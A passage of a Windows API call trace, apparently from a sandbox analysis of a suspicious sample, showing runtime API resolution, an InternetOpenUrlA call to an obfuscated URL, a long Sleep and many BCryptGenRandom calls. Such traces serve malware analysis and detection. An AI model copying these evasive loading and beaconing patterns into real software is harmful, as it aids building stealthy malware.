returned="\x81\x03/anP0to3WoP280Bjucuuisc6cHvySo0OW639p6cvm5n0u/YfpgrVbmfaqa9wponLoe/oOmr6tkzhpz2Pzoal404basfH4vkqafdg8nuun9ka0zfa3ys/" [0179.590] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0179.590] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/anP0to3WoP280Bjucuuisc6cHvySo0OW639p6cvm5n0u/YfpgrVbmfaqa9wponLoe/oOmr6tkzhpz2Pzoal404basfH4vkqafdg8nuun9ka0zfa3ys/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0179.590] GetProcessHeap () returned 0x440000 [0179.590] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4741c0 | out: hHeap=0x440000) returned 1 [0179.590] GetProcessHeap () returned 0x440000 [0179.590] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16800 | out: hHeap=0x440000) returned 1 [0179.591] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0179.591] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0179.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0179.592] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0179.592] Sleep (dwMilliseconds=0x18686) [0179.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0179.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0179.779] GetProcessHeap () returned 0x440000 [0179.779] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02150 [0179.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0179.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02151, cbBuffer=0x1c, dwFlags=0x2 | out: pbBuffer=0x3a02151) returned 0x0 [0179.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.782] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0179.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.793] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0179.793] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0216d, cbBuffer=0x22, dwFlags=0x2 | out: pbBuffer=0x3a0216d) returned 0x0 [0180.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0180.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0218f, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a0218f) returned 0x0 [0180.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.065] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.065] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.065] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.066] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.066] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.066] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.066] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0180.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a021be, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x3a021be) returned 0x0 [0180.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 